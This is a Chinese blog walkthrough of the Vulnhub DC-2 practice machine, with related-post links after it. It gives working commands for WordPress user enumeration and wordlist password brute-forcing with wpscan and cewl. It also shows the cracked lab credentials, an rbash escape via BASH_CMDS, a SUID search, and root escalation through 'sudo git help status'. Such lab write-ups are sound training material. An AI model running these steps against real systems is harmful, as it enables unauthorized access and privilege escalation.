靶场DC-2通关详解

于 2024-09-27 13:50:18 发布
阅读量478 收藏 13
点赞数 13
文章标签: adb 程序人生
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84675197/article/details/142589668
版权

1.先用Ifconfig查看自己的IP(在kali虚拟中使用命令ifconfig,获取地址)

2.后用nmap -sP 192.168.246.129/24扫描网段主机,寻找靶机真实ip

3.信息收集,探端口及服务

nmap -A -p- -v 192.168.246.254

    发现开放了80端口和7744端口

4.访问web站点

http:// 192.168.66.141

可以发现访问不了

发现访问不了,发现我们输入的ip地址自动转化为了域名,想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。

修改hosts文件,添加靶机IP到域名dc-2的指向

vim /etc/hosts

添加后再次访问,访问成功

可以很明显的发现这是一个wordpress的站点

5.发现flag1

在网页下面我们flag

点进入发现是flag1
大致意思如下:
你通常的单词列表可能不起作用,所以,也许你只是得小心点。
更多的密码总是更好,但有时你就是赢不了他们都是。
以一个身份登录,以查看下一个标志。
如果你找不到它,就以另一种身份登录。

大致意思就是暴力破解,账号密码

6.做一个目录扫描

dirb http://dc-2/

发现疑似后台地址

访问网址打开之后进入登录界面

发现多个没有什么有用的东西

7.用户名枚举

前面我们提到这是一个wordpress的站,我们采用专门针对wordpress的工具wpscan来进行扫描

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。

    Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

    扫描wordpress版本

wpscan --url http://dc-2

登录页面尝试登录
随即输入用户名密码,提示用户名不存在,

似乎可以进行用户名枚举

 首先来个用户枚举,再尝试利用枚举到的用户爆破密码

wpscan --url http://dc-2 --enumerate u

枚举出三个用户名

admin jerry tom

8.暴力破解出账号密码

根据flag1可以用暴力破解,我们使用cewl生成字典,

Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件,你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外,Cewl还提供了命令行工具。

为了方便大家记录,或者为将来的研究提供参考,Cewl可以将打印出的字典存储为文件。这里可以使用-w参数来将密码字典存储为text文件:

cewl http://dc-2/ -w dict.txt   或者 cewl http://dc-2/ > 1.txt

这里用ls查看创建成功没有

使用wpscan进行暴力破解

wpscan --url http://dc-2 --passwords dict.txt

往下滑找到密码账号

9. 爆破出来两个账号 

jerry/adipiscing

tom/parturient

登录后台后我们登录tom在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

    登录ssh

ssh tom@192.168.66.141 -p 7744

在tom账号的家目录 发现flag3
cat用不了

接下来,尝试rbash绕过详情参考 https://xz.aliyun.com/t/7642

查看可以使用的命令

echo $PATH

cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

Good to see that you've made it this far - but you " re not home yet .

很高兴看到你走了这么远,但你还没回家。

You still need to get the final flag (the only flag that really counts!!! ).

您仍然需要获得最后的标志(唯一真正重要的标志!)

No hints here 一you're on your own now. :- )

这里没有暗示,一,你现在只能靠自己了。*-)

Go on

继续

git outta here!!!!

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

    使用tom用户无权限运行sudo 我们切换到jerry用户

    我们可以看到无需root权限,jerry 可以使用 git

sudo -l  

我们需要先提权

查看一下可以使用的root权限命令

find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

10.使用git命令进行提取

sudo git help status

提取后whoami

出现root

cd /root后ls查看

cat final-flag.txt

咕噜噜噜噜噜.
关注
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-15 2297
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-2 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试综合靶场 DC-2 通关详解
goldfish8848的博客
09-18 1035
DC-2与DC-1的渗透步骤有一些相似之处,但也存在一些区别。靶机发现与IP解析DC-2:发现靶机真实IP后,需要修改hosts文件以解析域名到IP地址,因为直接访问IP时域名解析失败。DC-1:没有提到需要修改hosts文件,直接通过IP进行渗透测试。端口探测DC-2:探测到除了常见的80端口外,还有一个7744端口开放。DC-1:主要提到了22和80端口,没有提到7744端口。网站配置与访问DC-2:需要修改hosts文件后才能访问网站,且网站是基于WordPress的。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1221
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1814
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1242
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 9050
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
靶场DC-1通关详解
2401_84693966的博客
09-25 583
17,输入cd /usr/share/john进入john目录下,再输入hydra -l flag4 -P password.lst ssh://192.168.66.140得出一行绿色证明做出。:就是我们搭建的靶场靶场Ip为:XXX.XXX.XXX.XXX/24 扫描网段中有哪主机在线,使用-sp参数,不扫描端口,只扫存活的主机。9.发现是www-data权限,输入cd/home ls 输入cdflag4/ ls 输入catflag4.txt。11,在输入ls 发现了flag1文件,
综合靶场 DC-1 通关详解
2401_84691735的博客
09-22 472
它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。目标就是我们搭建的靶场靶场IP为:XXX.XXX.XXX.XXX/24。
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 988
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
sqllib靶场1-5通关详解
09-24
详细记载了sqllib靶场1-5的通关
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
MySql的慢查询(慢日志)
最新发布
zhzjn的博客
09-26 717
慢查询日志,就是查询花费大量时间的日志,是指mysql记录所有执行超过参数设定的时间阈值的SQL语句的日志,以帮助开发者分析和优化数据库查询性能。默认情况下,慢查询日志是关闭的,要使用慢查询日志功能,首先要开启慢查询日志功能。
MYSQL SWAP 内存 vm.swappiness
jnrjian的博客
09-20 913
关于 vm.swappiness 的困惑来自于这样一个事实:在较旧的 Red Hat 内核中,vm.swappiness 的值为 0 会导致最少量的交换以避免内存不足的情况。在较新的内核中(从 RHEL 内核 2.6.32-303 开始​​),值为 0 将完全禁用交换,但值为 1 将提供最少量的交换以避免内存不足的情况。在较旧的内核中,0 和 1 之间的实际差异并不大,但 1 是避免较新内核中出现 OOM 情况的安全设置(当然,假设有一些交换空间可用)。考虑到系统自动将未使用的页面交换到磁盘。
MySQL之基本查询(二)(update || delete || 聚合函数 || group by)
zdlynj的博客
09-23 843
首先,我们分析一下需求,我们需要的数据是平均工资和最低工资,这个可以使用函数avg和min,来实现。2、实际上 TRUNCATE 不对数据操作,所以比 DELETE 更快,但是TRUNCATE在删除数据的时候,并不经过真正的事务,所以无法回滚。首先,创建一个雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。分组的目的是为了进行分组之后,方便进行聚合统计。然后,我们需要根据分组聚合的结果,进行筛选,显示平均工资低于2000的部门和它的平均工资。
Docker安装和配置MySQL 5.7的完整指南
TechEnthusiast的博客
09-25 190
本指南将详细介绍如何使用Docker安装MySQL 5.7,并进行全面的配置。我们将涵盖从基本安装到性能优化、安全设置、备份策略和监控等各个方面。
踩坑记录:adb修改settings数据库ContentObserver无回调
dzy_mails的专栏
09-20 369
指定user 0即可,如果不加user 0指定user 0,修改的会是user 10,但是ContentObserver的user.id是0,所以无回调。在Android 14版本开发过程中遇到一个,通过adb修改settings数据库,发现生效但是监听的ContentObserver无回调。/data/system/user,会发现下面有0和10两个文件夹,高版本Android settings不再使用db存,而是xml文件。可以执行如下打印,会发现打印的userId是0。如何判断是user 0。
upload-labs靶场1-21通关
08-17
你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值